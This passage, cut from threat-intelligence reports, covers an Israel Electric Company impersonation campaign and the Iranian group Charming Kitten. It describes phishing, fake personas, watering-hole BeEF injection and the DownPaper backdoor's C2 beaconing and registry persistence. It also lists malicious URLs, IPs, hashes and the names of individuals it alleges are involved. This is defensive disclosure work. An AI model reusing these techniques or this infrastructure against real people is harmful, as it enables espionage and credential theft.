another site. At the bottom was a link saying
Here For Watch It !
2/13
The link pointed to goo[.]gl/zxhJxu (Google
s URL shortening service). According to the statistics page, it had been
created on September 25, 2016 and have been clicked only 11 times. When clicked, it would redirect to
iecr[.]co/info/index_info.php .
We do not know what was the content in the final URL. We estimate that it served malware. The domain iecr[.]co
was used as a command and control server for other malware in this campaign.
Another URL, http://ynetnewes[.]com/resources/assets/downloads/svchost.exe
hosted a malware file called program_stream_film_for_watch.exe.
(d020b08f5a6aef1f1072133d11f919f8)
Fake Facebook profile
Linda Santos
One of the above mentioned malicious URLs was spread via comments by a fake Facebook profile
Linda Santos
(no longer available):
In September 2016, the fake profile commented to posts by Israel Electric Company:
3/13
4/13
The profile had dozens of friends, almost all were IEC employees:
5/13
The fake profile was following only three pages, one of which was the IEC official page:
Pokemon Go Facebook page
In July 2016, when mobile game
Pokemon Go
was at the peak of its popularity, the attackers created a Facebook
page impersonating the official Pokemon Go page:
The page, which is no longer available, had about one hundred followers
most were Arab Israelis and some were
Jewish Israelis.
Only one post was published, with text in English and Hebrew. Grammatical mistakes indicate the attackers are not
native to both languages:
6/13
The post linked to a malicious website hosted in yolasite.com (which is a legitimate website building and hosting
platform):
pokemonisrael.yolasite[.]com
The button
literal translation
To download phone and computer
) linked to a zip file in
another website:
7/13
http://iec-co-il[.]com/iec/electricity/Pokemon-PC.zip
Note that the domain being impersonated is that of Israel Electric Company
s website (iec.co.il).
Pokemon-PC.zip (40303cd6abe7004659ca3447767e4eb7) contained Pokemon-PC.exe
(e45119a72677ed15ee0f04ef936a9803), which at run time drops monitar.exe
(d3e0b129bad263e6c0dcb1a9da55978b):
Android phone malware
The attackers also distributed a malicious app for Android devices
pokemon.apk
(3137448e0cb7ad83c433a27b6dbfb090). This malware also had characteristics that impersonate IEC, such as the
package name:
The application is a dropper that extracts and installs a spyware. The dropper does not ask for any permission
during installation:
However, when the spyware is installed, it asks for multiple sensitive
permissions:
The victim ends up with two applications installed on their device. The
Dropper, pretending to be a Pokemon Go app, adds an icon to the phone
dashboard. However, it does not have any functionality, and when clicked,
this error message is displayed:
Error 505
Sorry, this version is not compatible with your android version.
The dropper does not really check what android version is installed:
8/13
The message is intended to make the victim believe that the Pokemon game does not work because of compatibility
issues.
The victim is likely to uninstall the application at this point. However, because a second application was installed, the
phone would stay infected unless it is uninstalled as well.
9/13
Websites for Malware distribution
Malware was also hosted in legitimate breached Israeli websites, such as this educational website:
http://www.bagrut3.org[.]il/upload/edu_shlishit/passwordlist.exe (defc340825cf56f18b5ba688e6695e68)
and a small law firm
s website:
http://sheinin[.]co.il/MyPhoto.zip (650fcd25a917b37485c48616f6e17712)
In journey-in-israel[.]com, the attackers inserted an exploit code for CVE-2014-6332
a Windows code execution
vulnerability. The exploit was copied from an online source, likely from here, as the code included the same
comments. The website also hosted this malware: afd5288d9aeb0c3ef7b37becb7ed4d5c.
In other cases, the attackers registered and built malicious websites: users-management[.]com
and sourcefarge[.]net (similar to legitimate software website sourceforge.net). The latter was redirecting to journeyin-israel[.]com and iec-co-il[.]com in May and July 2016, according to PassiveTotal:
Sample 24befa319fd96dea587f82eb945f5d2a, potentially only a test file, is a self-extracting archive (SFX) that
contains two files: a legitimate Putty installation and link.html:
When run, while putty is installed, the html file is opened in a browser and redirects to http://tinyurl[.]com/jerhz2a and
then to http://users-management[.]com/info/index_info.php?id=9775. The last page 302 redirects to the website of
an Israeli office supply company Mafil:
10/13
Sample f6d5b8d58079c5a008f7629bdd77ba7f , also a self-extracting archive, contained a decoy PDF document
and a backdoor:
The PDF, named IEC.pdf, is a warranty document taken from Mafil
s public website. It is displayed to the victim
while the malware (6aeb71d05a2f9b7c52ec06d65d838e82) is infecting its computer:
Windows Malware
The attackers developed three malware types for Windows based computers:
11/13
Dropper
self-extracting archives that extract and run the backdoor, sometimes while opening a decoy PDF
document or website.
(For example: 6fa869f17b703a1282b8f386d0d87bd4)
Trojan backdoor / downloader
malware that collects information about the system and can download
and execute other files. (909125d1de7ac584c15f81a34262846f)
Some samples had two hardcoded command and control servers: iecrs[.]co and iecr[.]co (note once again
the use of IEC in the domain name).
Keylogger / screen grabber
records keystrokes and takes screenshots. The malware file is compiled
Python code. (d3e0b129bad263e6c0dcb1a9da55978b)
An analysis of the malware and other parts of the campaign was published by Mcafee in on November 11, 2016.
The latest known sample in this campaign (7ceac3389a5c97a3008aae9a270c706a) has compilation timestamp of
February 12, 2017. It is dropped when
pdf file products israel electric.exe
(c13c566b079258bf0782d9fb64612529)
is executed.
Attribution
In a report that covers other parts of the campaign, Mcafee attribute it to Gaza Cybergang (AKA Gaza Hacker Team
AKA Molerats). However, the report does not present strong evidence to support this conclusion.
While initially we thought the same, currently we cannot relate Operation Electric Powder to any known group.
Moreover, besides Mohamad potentially being the name of the malware developer (based on PDB string found in
multiple
samples: C:\Users\Mohammed.MU\Desktop\AM\programming\C\tsDownloader\Release\tsDownloader.pdb
), we do not have evidence that the attackers are Arabs.
Indicators of compromise
Indicators file: Operation-Electric-Powder-indicators.csv (also available on PassiveTotal).
Notably, all but one of the IP addresses in use by the attackers belong to German IT services provider
Accelerated IT Services GmbH
(AS31400):
84.200.32.211
84.200.2.76
84.200.17.123
84.200.68.97
82.211.30.212
82.211.30.186
82.211.30.192
Florian Roth shared a Yara rule to detect the downloader: Operation-Electric-Powder-yara.txt
The graph below depicts the campaign infrastructure (click the image to see the full graph):
12/13
Live samples can be downloaded from the following link:
https://ln.sync[.]com/dl/30e722bf0#f72zgiwk-zxcp3e9t-fa9jyakr-zpbf5hgg
(Please email info@clearskysec.com to get the password.)
Acknowledgments
This research was facilitated by PassiveTotal for threat infrastructure analysis, and by MalNet for malware research.
13/13
Charming Kitten
Iranian cyber espionage against human rights
activists, academic researchers and media outlets and the HBO hacker connection
ClearSky Cyber Security
December 2017
Contents
Introduction ..........................................................................................................................................................3
Targets .........................................................................................................................................................3
Charming Kitten or Rocket kitten? .......................................................................................................................4
The HBO hacker and Charming Kitten ..................................................................................................................5
HBO hacking indictment ..............................................................................................................................5
Connection to Iranian government backed threat agent ............................................................................5
From Mesri to Charming Kitten ...................................................................................................................6
Delivery and Infection ........................................................................................................................................16
Made up organizations and people ...............................................................................................................16
British News ...............................................................................................................................................16
Made up studens and jurnalists.................................................................................................................24
Impersonating real companies.......................................................................................................................30
United Technologies impersonation..........................................................................................................30
Watering holes ...............................................................................................................................................32
Spear Phishing for credential stealing............................................................................................................34
Wave 1 .......................................................................................................................................................34
Wave 2 .......................................................................................................................................................36
Wave 3 .......................................................................................................................................................37
Email tracking services ...............................................................................................................................45
Targeted emails with malware.......................................................................................................................46
DownPaper Malware ..........................................................................................................................................47
Additional samples.....................................................................................................................................49
MAGICHOUND.RETRIEVER .................................................................................................................................50
Appendix A - Indicators of Compromise.............................................................................................................51
Appendix B - Previous reports about Charming Kitten and Rocket Kitten .........................................................59
Page 2 of 59
All rights reserved to ClearSky Cyber Security, 2017
Introduction
Charming Kitten is an Iranian cyberespionage group operating since approximately 2014. This report exposes
their vast espionage apparatus, active during 2016-2017. We present incidents of company impersonation,
made up organizations and individuals, spear phishing and watering hole attacks. We analyze their
exploitation, delivery, and command-and-control infrastructure, and expose DownPaper, a malware
developed by the attackers, which has not been publicly documented to date.
Incidents documented in this report are likely a small fraction of the actual amount of targeted attacks,
which may reach thousands of individuals. We expose more than 85 IP addresses, 240 malicious domains,
hundreds of hosts, and multiple fake entities
most of which were created in 2016-2017. The most recent
domains (com-archivecenter[.]work, com-messengerservice[.]work and com-videoservice[.]work) were
registered on December 2nd, 2017, and have probably not been used in attacks yet.
We present the connection between Behzad Mesri, an Iranian national recently indicted for his involvement
in hacking HBO, and Charming Kitten. We also identify other members of the group.
This report refers to two likely distinct groups, Charming Kitten and Rocket Kitten, together. This is not to
say that the two groups are one, but that due to overlap in infrastructure, tools, targets, and modus
operandi we are unable to precisely attribute each incident to one or the other. Further discussion appears
in the section "Charming Kitten or Rocket kitten?"
Targets
The attackers' focus appears to be individuals of interest to Iran in the fields of Academic research (i.e.
Iranists - Scholars who study Iran), Human right and media. Emphasis is given to Iranian dissidents living in
Iran or abroad, and people who come in touch with Iranians or report on Iranian affairs such as journalists
and reporters, media outlets covering Iran, and political advisors.
Most targets known to us are individuals living in Iran, the United States, Israel, and the UK. Others live in
Turkey, France, Germany, Switzerland, United Arab Emirates, India, Denmark and other countries.
Notably, the attackers usually try to gain access to private email and Facebook accounts. They seek to
infiltrate the targets
social network as a hop point to breach other accounts in their social network, or to
collect information about their targets. Sometimes, they aim at establishing a foothold on the target
computer to gain access into their organization, but, based on our data, this is usually not their main
objective, as opposed to other Iranian threat groups, such as Oilrig1 and CopyKittens2.
http://www.clearskysec.com/oilrig/
http://www.clearskysec.com/tulip/
Page 3 of 59
All rights reserved to ClearSky Cyber Security, 2017
Charming Kitten or Rocket kitten?
While Iranian threat actors have been well documented by security researchers, the inner workings of the
ecosystem of Iran's hackers is not entirely clear. Groups can be vigorously active for years and then
disappear abruptly, sometimes due to being publicly outed. Researchers make a best-faith effort to assign
operations to certain groups, but the instability in the field makes the process challenging.
A case of these obscure lines can be found in a blogpost published in coordination and parallel to this report
Flying Kitten to Rocket Kitten, A Case of Ambiguity and Shared Code
3 by Collin Anderson and Claudio
Guarnieri. Flying Kitten (which is another name given by the security industry to Charming Kitten) was one of
the first groups to be described as a coherent threat actor conducting operations against political opponents
of the IRI (Islamic Republic of Iran) government and foreign espionage targets. FireEye
s publication of
Operation Saffron Rose
report, which described Flying Kitten
s operations against aviation firms, led to the
dismantling of Flying kitten's infrastructure and the apparent end of its activities. Months later, another,
seemingly distinct group,
Rocket Kitten,
would be described by a series of reports.
While the two groups exhibited different behaviors that lend credence to the assumption they were distinct,
disclosures of private toolkits strongly suggest that Rocket Kitten had used Flying Kitten resources
throughout its credential-theft operations. Moreover, Rocket Kitten had experimented with reusing malware
that appeared to be an undisclosed precursor to Flying Kitten's
Stealer
agent documented by FireEye.
These overlaps provide some indication that Rocket Kitten had some relationship to Flying Kitten
perhaps
members of the latter joining the new team. Rocket Kitten has since largely subsided as a formidable actor,
and repeating the theme of its predecessor now only appears in echoes of other campaigns.
Read -
Flying Kitten to Rocket Kitten, A Case of Ambiguity and Shared Code
here:
https://iranthreats.github.io/resources/attribution-flying-rocket-kitten.
Further information is available in "Appendix B - Previous reports about Charming Kitten and Rocket Kitten".
https://iranthreats.github.io/resources/attribution-flying-rocket-kitten
Page 4 of 59
All rights reserved to ClearSky Cyber Security, 2017
The HBO hacker and Charming Kitten
HBO hacking indictment
In November 21, 2017, the United States Department of Justice unsealed an indictment4 against Behzad
Mesri (A.K.A
Skote Vahshat
)5 for his involvement hacking and extorting HBO, and for subsequently leaking
the stolen content on the Internet. Leaked content included confidential information about upcoming
episodes of the popular television series,
Game of Thrones,
and video files containing unreleased episodes
of other television series created by HBO6.
According to the indictment, "Mesri is an Iran-based computer hacker who had previously worked on behalf
of the Iranian military to conduct computer network attacks that targeted military systems, nuclear software
systems, and Israeli infrastructure. At certain times, Mesri has been a member of an Iran-based hacking
group called the Turk Black Hat security team".
Connection to Iranian government backed threat agent
Security researcher Collin Anderson of Iran Threats7 tagged Mesri's twitter account8 in a tweet9 suggesting
that Mesri might be related to Charming Kitten.
https://www.justice.gov/usao-sdny/pr/acting-manhattan-us-attorney-announces-charges-against-iranian-nationalconducting
https://www.fbi.gov/wanted/cyber/behzad-mesri
Other stolen content includes: (a) confidential video files containing unaired episodes of original HBO television
programs, including episodes of
Barry,
Ballers,
Curb Your Enthusiasm,
Room 104,
and
The Deuce
; (b) scripts
and plot summaries for unaired programs, including but not limited to episodes of
Game of Thrones
; (c) confidential
cast and crew contact lists; (d) emails belonging to at least one HBO employee; (e) financial documents; and (f) online
credentials for HBO social media accounts (collectively, the
Stolen Data
https://iranthreats.github.io/
https://twitter.com/skote_vahshat
https://twitter.com/CDA/status/932992141466279936
Page 5 of 59
All rights reserved to ClearSky Cyber Security, 2017
Subsequently, we tried to find connections of Mesri to other activities and people mentioned in this report.
Thanks to the public nature of how Mesri and other members of Turk Black Hat conducted their hacking
activities and private online life, we could find several connections. This is not to say that the HBO hack was
ordered by the Iranian government. Rather, we try to strengthen the assumption that Mesri was, at a certain
time, part of, or related to Charming Kitten. In addition, we unmask other members of the group based on
their connection to Mesri and to Charming Kitten infrastructure.
From Mesri to Charming Kitten
ArYaIeIrAN (AKA aryaieiran@gmail.com AKA aryaieiran@hotmail.com AKA mno_1988_fgh@yahoo.com)
is a 29 years old Iranian hacker and member of Turk Black Hat. Below is his profile page in "Iranian
engineers club"10:
http://www.iran-eng.ir/member.php/77662-ArYaiEiRan?langid=1
Page 6 of 59
All rights reserved to ClearSky Cyber Security, 2017
A list of websites he defaced, listed on Zone-H11:
And a mirror page of a defacement he made in 2012, showing some of his team members and email address:
http://www.zone-h.org/archive/notifier=ArYaIeIrAn
Page 7 of 59
All rights reserved to ClearSky Cyber Security, 2017
The same email address, aryaieiran@gmail.com, shows up in the SOA (Start of Authority) record of multiple
domains registered and used by Charming Kittens that are presented in this report. These include
britishnews.com[.]co, britishnews[.]org, broadcastbritishnews[.]com and mehrnews[.]info. All these websites
used persiandns[.]net as their NS (name server), as can be seen in PassiveTotal12 13:
https://community.riskiq.com/search/britishnews.org
https://community.riskiq.com/search/britishnews.com.co
Page 8 of 59
All rights reserved to ClearSky Cyber Security, 2017
aryaieiran@gmail.com also registered persiandns[.]net, potentially indicating that he is the administrator of
the services and an employee in the company:
In a defacement, still online at the time of writing, both ArYaIeIrAn and Skote_Vahshat, the HBO hacker, take
credit as members of Turk Black Hat. This indicates that both were members of Turk Black Hat at the same
time, and likely knew each other.
Page 9 of 59
All rights reserved to ClearSky Cyber Security, 2017
persiandns[.]net hosting services, which hosted malicious domains used by charming kitten, redirects to
mahanserver[.]ir, indicating it is the same company:
The about page (
of mahanserver[.]ir leads to a 404 error page:
Page 10 of 59
All rights reserved to ClearSky Cyber Security, 2017
The CEO of mahanserver[.]ir is Mohammad Rasoul Akbari (A.K.A ra3ou1), likely the boss or partner of
ArYaIeIrA:
Page 11 of 59
All rights reserved to ClearSky Cyber Security, 2017
The two follow each other on twitter:
Akbari is a Facebook friend of the HBO hacker, Behzad Mesri 14.
https://www.facebook.com/friendship/sk0te.vahshat/ra3ou1/
Page 12 of 59
All rights reserved to ClearSky Cyber Security, 2017
On Linkedin, MahanServer only has two employees: CEO Mohammad Rasoul Akbari and Mohammadamin
Keshvari:
Interestingly, Mohammadamin Keshvari's profile picture is a pomegranate, like that of ArYaIeIrAN
s twitter
account15:
https://twitter.com/aryaieiran
Page 13 of 59
All rights reserved to ClearSky Cyber Security, 2017
Moreover, Mohammadamin Keshvari mentions in his LinkedIn profile that he works at ARia Dc (ariadc[.]com,
ariadc[.]net) which was registered by aryaieiran@gmail.com for three days in 2013 before changing to a
generic email16:
ARia Dc later turned into MahanServer, as can be seen in Waybac Machine:
Data from DomainTools whois history.
Page 14 of 59
All rights reserved to ClearSky Cyber Security, 2017
To sum up, the HBO hacker - Behzad Mesri is a member of Turk Black Hat along with ArYaIeIrAn, who
provides infrastructure for Charming Kitten activity via PersianDNS / Mahanserver together with
Mohammad Rasoul Akbari, who is a Facebook friend of Behzad Mesri's. We tend to identify ArYaIeIrAn with
Mohammadamin Keshvari, because the latter is the only other employee of Mahanserver and works in a
company whose domain was registered by the former (and both have a similar and unique profile picture).
We estimate with medium certainty that the three are directly connected to Charming Kitten, and
potentially, along with others
are Charming Kitten.
We used SocialNet, Shadow Dragon
s Maltego transform for social media analysis17 to analyze these
connections and visually depict them, as can be seen below:
https://shadowdragon.io/product/socialnet
Page 15 of 59
All rights reserved to ClearSky Cyber Security, 2017
Delivery and Infection
Charming Kitten attack their targets using the following methods:
Made up organizations and people
entities are made up to lure people into malicious websites or
to receive malicious messages.
Impersonating real companies
real companies are impersonated, making victims believe they are
communicating or visiting the website of the real companies.
Watering hole attacks
inserting malicious JavaScript code into breached strategic websites.
Spear phishing
pretending to be Gmail, Facebook, and other services providers, or pretending to
be a friend of the target sharing a file or a link.
These methods are elaborated below.
Made up organizations and people
British News
Charming kitten regularly target international media outlets with Persian-language services. Two recent
reports
"How Iran tries to control news coverage by foreign-based journalists"18 and "Iranian agents
blackmailed BBC reporter with
naked photo
threats"19 describe harassment and intimidation methods
applied by Iranian intelligence agencies. These campaigns often target reporters and journalists in phishing
attempts.
On the same note, we identified a fake-news agency "established" by the attackers, called
The British news
agency
or
Britishnews
(inspired by BBC)20. Its website domain is britishnews.com[.]co and two other
domains, broadcastbritishnews[.]com and britishnews[.]org, redirected to it. Below are screenshots of the
main page of the website, which is online at time of writing:
https://rsf.org/en/news/how-iran-tries-control-news-coverage-foreign-based-journalists
http://www.arabnews.com/node/1195681/media
Outed in collaboration with Forbs On Jan 2017, see
With Fake News And Femmes Fatales, Iran's Spies Learn To Love
Facebook
forbes.com/sites/thomasbrewster/2017/07/27/iran-hackers-oilrig-use-fake-personas-on-facebook-linkedin-for19
cyberespionage
Page 16 of 59
All rights reserved to ClearSky Cyber Security, 2017
Below is a screenshot from the
about
page of the fake news agency website, detailing its objectives and
giving the email addresses of various
employees
Page 17 of 59
All rights reserved to ClearSky Cyber Security, 2017
Note the use of present perfect instead of past simple in "has been established" (instead of "was
established"), present progressive (we are covering) instead of present simple (we cover) to mark a habitual
aspect, and "began this work"
all suggesting a Persian-thinking writer.
This fake news-agency and accompanying social media accounts are not used to disseminate propaganda or
false information. Their content was automatically copied from legitimate sources. The purpose of this news
agency is to create legitimacy, with the end goal of reaching out to their targets and infecting them while
visiting the infected website.
The website contains BeEF (Browser Exploitation Framework
a penetration testing tool that focuses on web
browsers), however it seems that the payload is sent only when the victim visits the site from IPs in a whitelist
managed by the attackers. This might indicate they are after specific targets or organizations rather than
widespread infection.
The screenshot below shows w3school.hopto[.]org, which served BeEF, called when britishnews.com[.]co is
loading:
Page 18 of 59
All rights reserved to ClearSky Cyber Security, 2017
Page 19 of 59
All rights reserved to ClearSky Cyber Security, 2017
At the bottom of the site are links to social media accounts created by the attackers:
Below are screenshots of the accounts.
Instagram, Instagram[.]com/britishnewslive with over 13,000 followers (unavailable for several months):
Page 20 of 59
All rights reserved to ClearSky Cyber Security, 2017
Twitter, https://twitter[.]com/britishnewslive (online at time of writing):
Facebook page - facebook[.]com/officialbritishnewslive (unavailable for several months):
Page 21 of 59
All rights reserved to ClearSky Cyber Security, 2017
LinkedIn company page, linkedin[.]com/company/britishnews (unavailable for several months):
The attackers also created a fake LinkedIn profile, Isabella Carey, that
worked
at the fake news company:
linkedin[.]com/in/isabella-carey-98a42a129 (unavailable for several months):
Page 22 of 59
All rights reserved to ClearSky Cyber Security, 2017
An email address with the same name, isabella.careyy@gmail.com, was used to register 12 malicious
domains by Charming Kitten, as can be seen in PassiveTotal21:
https://community.riskiq.com/search/whois/email/isabella.careyy@gmail.com
Page 23 of 59
All rights reserved to ClearSky Cyber Security, 2017
Made up studens and jurnalists
Multiple Israeli Iranist and middle east researchers were sent emails and Twitter direct messages by made up
entities. These entities are reviewed below.
Zehavit Yehuda
One of the fake entities is
KNBC News journalist Zehavit Yehuda
, who sent the following phishing email:
The email links to a website, https://sites.google[.]com/view/docs-downloads, which was built with Google
Sites:
Page 24 of 59
All rights reserved to ClearSky Cyber Security, 2017
The Download button is a redirection link:
http://www.google[.]com/url?q=http%3A%2F%2Fdownload-google.comorginallinks.ga%2Fdownload%2Ffile%2Fusr%&sa=D&sntz=1&usg=
Which leads to a fake log-in page in a domain registered by the attackers:
http://download-google.com-orginal-links[.]ga/download/file/usr/
Yafa Hyat
Fake entity "Yafa Hyat" (@yafa1985hyat, online at time of writing) has contacted an
Israeli Iranist via a direct message on twitter, pretending to be a political researcher who
needs help with an article:
Page 25 of 59
All rights reserved to ClearSky Cyber Security, 2017
The researcher was asked to read the article in her "google account", which was also a phishing page in Google
sites: https://sites.google[.]com/site/yaffadocuments/ :
Page 26 of 59
All rights reserved to ClearSky Cyber Security, 2017
The site automatically redirects to a phishing website hosted in a domain registered by the attackers, downloadgoogle.orginal-links[.]com:
"Yafa" also sent an email from yaffa.hyatt9617@gmail.com to a university professor, asking to work at the
university center she is heading. The email itself did not contain malicious content, and was likely sent to build
trust prior to sending a phishing link or malware:
Page 27 of 59
All rights reserved to ClearSky Cyber Security, 2017
Bahar Azadeh
Fake entity "Bahar Azadeh" (bahra.azadeh88@gmail.com and @baharazadeh122, online at time of writing)
sent emails with different background stories to multiple researchers. In two cases, she was a "Jewish girl
who has an Iranian origin and who has studied in the field of political science":
https://twitter.com/baharazadeh1
Page 28 of 59
All rights reserved to ClearSky Cyber Security, 2017
Yet in a third case she claimed to be Baha'i living in Tehran:
Translation:
Hello,
Mr. Dr., I am a Bahai living in Tehran, if you can call it a life. As you know, the present situation in Iran for
us Bahais is not good at all, so that we are even deprived of our natural right, that is, higher education, as
if we Bahais are not human and have no right to live.
, I have been accepted to universities all across Iran, and after two years of studying in a
university, they realized from certain sources that I was Bahai, and expelled me. I did not sit idle and began
to constantly protest, I've been summoned [to court] quite a few times for this thing, and I already feel
Iran has become a hell for me, and as much as I try I can't find salvation from this hell.
One of the reasons I've asked you for help and guidance was reading your book (), and your
research in this field has been really valuable and helpful, which made this book so beautiful.
"I have a few questions for you, please answer me".
The entities
email address is connected to a fake Facebook entity called Emilia Karter
(online at time of writing):
Page 29 of 59
All rights reserved to ClearSky Cyber Security, 2017
Impersonating real companies
United Technologies impersonation
The attackers created a website impersonating UTC (United Technologies),
an American multinational
conglomerate which researches, develops and manufactures products in numerous areas, including aircraft
engines, [and] aerospace systems [
]. UTC is a large military contractor, getting about 10% of its revenue
from the U.S. government
23. The fake website was first reported by Iran Threats researchers on 6 February
201724. We do not have evidence that UTC was targeted or impacted.
The fake website, which was built in January 2017, claimed to offer
Free Special Programs And Courses For
Employees Of Aerospace Companies like Lockheed Martin, SNCORP,
. It was a decoy to make visitor
download a
Flash Player
, which was in fact DownPaper malware, analyzed later in this report.
https://en.wikipedia.org/wiki/United_Technologies
https://iranthreats.github.io/resources/macdownloader-macos-malware/
Page 30 of 59
All rights reserved to ClearSky Cyber Security, 2017
The malware was served from the following location:
http://login.radio-m[.]cf/utc/dnld.exe
It was contained in a cabinet self-extractor that impersonates a legitimate Windows software:
dnld.exe
be207941ce8a5e212be8dde83d05d38d
3b4926014b9cc028d5fb9d47fee3dbd9376525dcb3b6e2173c5edb22494cfa9b
Page 31 of 59
All rights reserved to ClearSky Cyber Security, 2017
Watering holes
The attackers breached the following websites pertaining to Iranian and Jewish cultural affairs:
Breached website
Description
hamijoo[.]com
An Iranian crowdfunding platform
www.jewishjournal[.]com
A Jewish news site
www.estherk[.]com
A personal blog of one of JewishJournal's writers
www.boloogh[.]com
A sex education website for Iranian youth
levazand[.]com
A personal blog of an Iranian living in United sates
A script tag that loads BeEF JavaScript from w3school.hopto[.]org or from bootstrap.serveftp[.]com was
added, as can be seen in the images below:
Page 32 of 59
All rights reserved to ClearSky Cyber Security, 2017
Page 33 of 59
All rights reserved to ClearSky Cyber Security, 2017
Spear Phishing for credential stealing
The attackers sent hundreds, maybe thousands, of spear phishing emails to hundreds of targets. In this section,
we will present samples of spear phishing emails25.
Wave 1
The attackers breached the Gmail account of Alon Gur Arye, an Israeli film producer. Alon produced a satire
film about the Israeli Mossad, which potentially confused the attackers to thinking he is associated with the
Israeli Mossad. The breached account was used to send a phishing email to Thamar Eilam Gindin (who is
targeted by the group since 201526). Below is a screenshot of the phishing email:
The email contained a shortened bit.ly link to a domain registered by the attackers - drivers.documentsupportsharing[.]bid. In the statistics and usage page of the bit.ly URL we can see that the first click, likely a
test run performed by the attackers before sending the phish, was from Iran.
Names of victims and targets are shared with their permission.
See , Thamar Reservoir: http://www.clearskysec.com/thamar-reservoir/
Page 34 of 59
All rights reserved to ClearSky Cyber Security, 2017
The phishing page pretends to be a Gmail shared document downed page that requires the visitor to log in:
Page 35 of 59
All rights reserved to ClearSky Cyber Security, 2017
Wave 2
Sometimes the phishing email does not contain live text, but only an image of text linked to a phishing page.
This is usually done to bypass text based spam filters.
The attackers used WebRTC (code copied from Github27) to detect the real IP address of targets who use
proxies (This method was documented by Iran Threats28):
While sending the spear phishing, the attackers preformed password recovery on the target
s Facebook
account, as can be seen below. Thus, she received fake emails and legitimate ones at the same time which
could cause her confusion and subsequently to give her credentials in the phishing.
https://github.com/diafygi/webrtc-ips/blob/master/README.md
https://iranthreats.github.io/resources/webrtc-deanonymization/
Page 36 of 59
All rights reserved to ClearSky Cyber Security, 2017
Wave 3
The attackers often open a new Gmail account and send phishing emails from it. For example,
suspended.user.noitification@gmail.com was used to send the following email to targets:
Which leads to:
Page 37 of 59
All rights reserved to ClearSky Cyber Security, 2017
In other cases, 7 different targeted phishing emails were sent to the same victim on the same day from
customers.mailservice@gmail.com:
Page 38 of 59
All rights reserved to ClearSky Cyber Security, 2017
Page 39 of 59
All rights reserved to ClearSky Cyber Security, 2017
The phishing messages were sent to hundreds of recipients from a previously unknown email address:
mails.customerservices@gmail.com
They contained a link to goo-gle[.]mobi
Below are screen captures of two of the messages. The content is not copied directly from Googles original
notices, as evident from the spelling and grammatical errors, some of them typical of Persian speakers, e.g.
using direct speech where English would use indirect speech ("that" instead of "whether"):
Page 40 of 59
All rights reserved to ClearSky Cyber Security, 2017
Hamed Hashemi, an Iranian Independent researcher and photographer living in the Netherlands was targeted
in this campaign. He detected the malicious emails and wrote about them in his twitter account29 30:
Translation: "The brothers'31 new method for hacking e-mails. Do not be fooled by such an email".
https://twitter.com/hamed_hashemi/status/869835075550162944
https://twitter.com/hamed_hashemi/status/869865703939219456
I.e. people working for the IRI.
Page 41 of 59
All rights reserved to ClearSky Cyber Security, 2017
Translation: "Ramez
n (The month of Ramadan) operation continues."
Other reported receiving 6 spear phishing emails within a few minutes. For example, Soudeh Rad32 board
member at ILGAEurope33 (an organization for human rights and equality for lesbian, gay, bisexual, trans and
intersex people at European level):
Translation: "What's the most important thing to do when you're under a phishing attack? Keep your calm
6 e-mails arrived within 10 minutes (saying) someone signed into your email (account), confirm your
account."
https://twitter.com/soudehrad/status/876062478685396992
https://twitter.com/ILGAEurope
Page 42 of 59
All rights reserved to ClearSky Cyber Security, 2017
Behrang Tajdin34 a BBC Persian TV Reporter said35 36 he was targeted in a similar campaign in April 2017:
Translation: "If you get an email like this, don't fall for it and don't click. It's nothing but a useless phishing
attempt to hack your google and Gmail account."
https://twitter.com/Behrang
https://twitter.com/Behrang/status/855761991117484032
Page 43 of 59
All rights reserved to ClearSky Cyber Security, 2017
Translation:
And if you click on the link but don't type your password, they send you another email. Don't fall
for "if you wait you regret"
Page 44 of 59
All rights reserved to ClearSky Cyber Security, 2017
Email tracking services
The attackers often use mailtrack.io to track when phishing emails are opened. These services are often used
by marketing people to monitor their campaign effectiveness. Below is the source code of a spear phishing
email with a mailtrack.io tracking link:
Sometimes the attackers used a similar email tracking service, by Pointofmail. In this case, the malicious
email was sent from Pointofmail
s servers (this is part of their service, not due to a breach). The email
contained a redirect link to legitimate address advmailservice.com:
Which redirects several times, eventually reaching the malicious page:
Page 45 of 59
All rights reserved to ClearSky Cyber Security, 2017
Targeted emails with malware
Email address customers.mailservice@gmail.com was mostly used for spear phishing. Occasionally, it was
used to deliver links to malware. For example, the email below linked to http://tinyurl[.]com/hjtaeak which
redirected to http://login.radio-m[.[cf/i/10-unique-chocolates-in-the-world.zip. The final URL contained the
same sample of DownPaper that was hosted in the fake UTC website mentioned above
(be207941ce8a5e212be8dde83d05d38d).
Note, that the person who
shared
the file with the target in the malicious email was indeed a Facebook
friend of the target (the target shared a link by her a few hours prior to receiving this message), and the
subject of chocolate was trending on the target's feed at the time. The attackers spied on the target
(potentially by following her on various social networks), and crafted an email she would be likely to receive.
Page 46 of 59
All rights reserved to ClearSky Cyber Security, 2017
DownPaper Malware
DownPaper, sometimes delivered as sami.exe, is a Backdoor trojan. Its main functionality is to download
and run a second stage.
The sample used in our analysis (3261d45051542ab3e54fa541f132f899) was contained in a Cabinet selfextractor (be207941ce8a5e212be8dde83d05d38d), served from the following URL:
http://login.radio-m[.]cf/utc/dnld.exe
The process tree below shows dnld.exe drops sami.exe (DownPaper), which in turn runs Powershell to gain
persistency:
DownPaper performs the following steps:
1. Loads from a resource file a URL of a command and control server. In the sample we
analyzed, the URL was
http://46.17.97[.]37/downloader/poster.php
, Base64 encoded as
can be seen below:
2. Searches and reads the value of Window Update registry key in the following path:
HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
a. If the value is Null, a new mutex is created, called Global\UpdateCenter, and a mutex
synchronization function is executed.
b. If the value is different than the name of the running file, section 2.a. is executed and a
function called SetStartUp is called via PowerShell to create a registry key named
Window Update with the following value:
Page 47 of 59
All rights reserved to ClearSky Cyber Security, 2017
$scriptRoot\AppData\Local\Microsoft\Windows\wuauclt.exe
3. Sends an HTTP POST request to get the location of a second stage from the command and control
server. The requests contain the following fields:
a. Infected computer host name
b. Username
c. Serial Number
Retrieved via the following query: SELECT * FROM Win32_BaseBoard
4. When a file is received, runs it in a new thread.
5. Pause for ten seconds, then repeat step 3.
Locations
C:\Users\user1\AppData\Local\Temp\IXP000.TMP\sami.exe
C:\Users\user1\AppData\Local\Microsoft\Windows\wuauclt.exe
Assembly Details:
PDB path:
d:\Task\D\Task\FUD\DownPaper\trunk\Downloader\obj\Debug\wuauclt.pdb
Page 48 of 59
All rights reserved to ClearSky Cyber Security, 2017
Additional samples
wuauclt.exe
d6ea39e1d4aaa8c977a835e72d0975e3
msoffice-update[.]com
93.158.215.50
http://msoffice-update[.]com/gallery/help.php
C:\Users\user1\AppData\Local\Temp\IXP000.TMP\sami.exe
